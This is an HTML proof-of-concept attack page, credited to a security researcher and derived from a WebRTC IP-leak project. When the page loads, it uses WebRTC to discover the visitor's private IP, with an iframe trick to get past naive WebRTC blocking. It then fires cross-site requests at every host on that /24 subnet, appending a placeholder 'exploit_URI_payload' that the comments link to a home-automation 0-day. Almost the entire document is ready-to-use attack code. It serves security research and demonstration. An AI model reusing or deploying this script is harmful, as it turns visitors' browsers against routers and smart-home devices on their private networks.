Smart CSRF PoC

1. <HTML><TITLE>Smart CSRF PoC</TITLE>
2. <!--
3. The MIT License (MIT)
4.  
5. Copyright (c) 2015 Daniel Roesler
6.  
7. Permission is hereby granted, free of charge, to any person obtaining a copy
8. of this software and associated documentation files (the "Software"), to deal
9. in the Software without restriction, including without limitation the rights
10. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11. copies of the Software, and to permit persons to whom the Software is
12. furnished to do so, subject to the following conditions:
13.  
14. The above copyright notice and this permission notice shall be included in all
15. copies or substantial portions of the Software.
16.  
17. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22. OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23. SOFTWARE.
24. -->
25. <script>
26. // Linkback: http://www.tripwire.com/state-of-security/off-topic/smart-csrf/
27. // This code is derived from a PoC I came across on GitHub: https://github.com/diafygi/webrtc-ips/blob/master/README.md
28. // I have only slightly modified it to assume the IP is on a /24 and iterate over the addresses with an HTTP request.
29. // A version of this script including the payload for a 0-day in a home automation product was demonstrated at:
30. //  DEF CON 23 IoT Village and InfoSec Europe 2015 Intelligent Defence in a talk titled 'Smart Home Invasion'
31. // Interestingly enough, this code worked in Chrome even without an Internet connection to reach the STUN server.
32. // -- Craig Young, Security Researcher Tripwire VERT
33.  
34. //get the IP addresses associated with an account
35. function getIPs(callback){
36.     var ip_dups = {};
37.  
38.     //compatibility for firefox and chrome
39.     var RTCPeerConnection = window.RTCPeerConnection
40.         || window.mozRTCPeerConnection
41.         || window.webkitRTCPeerConnection;
42.     var useWebKit = !!window.webkitRTCPeerConnection;
43.  
44.     //bypass naive webrtc blocking using an iframe
45.     if(!RTCPeerConnection){
46.         //NOTE: you need to have an iframe in the page right above the script tag
47.         //
48.         //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
49.         //<script>...getIPs called in here...
50.         //
51.         var win = iframe.contentWindow;
52.         RTCPeerConnection = win.RTCPeerConnection
53.             || win.mozRTCPeerConnection
54.             || win.webkitRTCPeerConnection;
55.         useWebKit = !!win.webkitRTCPeerConnection;
56.     }
57.  
58.     //minimal requirements for data connection
59.     var mediaConstraints = {
60.         optional: [{RtpDataChannels: true}]
61.     };
62.  
63.     //firefox already has a default stun server in about:config
64.     //    media.peerconnection.default_iceservers =
65.     //    [{"url": "stun:stun.services.mozilla.com"}]
66.     var servers = undefined;
67.  
68.     //add same stun server for chrome
69.     if(useWebKit)
70.         servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
71.  
72.     //construct a new RTCPeerConnection
73.     var pc = new RTCPeerConnection(servers, mediaConstraints);
74.  
75.     function handleCandidate(candidate){
76.         //match just the IP address
77.         var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
78.         var ip_addr = ip_regex.exec(candidate)[1];
79.  
80.         //remove duplicates
81.         if(ip_dups[ip_addr] === undefined)
82.             callback(ip_addr);
83.  
84.         ip_dups[ip_addr] = true;
85.     }
86.  
87.     //listen for candidate events
88.     pc.onicecandidate = function(ice){
89.  
90.         //skip non-candidate events
91.         if(ice.candidate)
92.             handleCandidate(ice.candidate.candidate);
93.     };
94.  
95.     //create a bogus data channel
96.     pc.createDataChannel("");
97.  
98.     //create an offer sdp
99.     pc.createOffer(function(result){
100.  
101.         //trigger the stun server request
102.         pc.setLocalDescription(result, function(){}, function(){});
103.  
104.     }, function(){});
105.  
106.     //wait for a while to let everything done
107.     setTimeout(function(){
108.         //read candidate info from local description
109.         var lines = pc.localDescription.sdp.split('\n');
110.  
111.         lines.forEach(function(line){
112.             if(line.indexOf('a=candidate:') === 0)
113.                 handleCandidate(line);
114.         });
115.     }, 1000);
116. }
117.  
118. getIPs(
119.     function(ip){
120.             var local_regex = /10\.[0-9]+\.[0-9]+\.|192\.168\.[0-9]+\.|172\.16\./
121.             if (local_regex.exec(ip) != null) {
122.                 var subnet = local_regex.exec(ip)[0];
123.                 for (node=1; node<256; node++) {
124.                     var url = 'http://' + subnet + node + exploit_URI_payload;
125.                     var oReq = new XMLHttpRequest();
126.                     oReq.open("get",url,true)
127.                     oReq.send();
128.                 }
129.             }
130.         }
131.     );
132. </script>
133. <H1>o0o0o0o0o0o0</H1>
134. </HTML>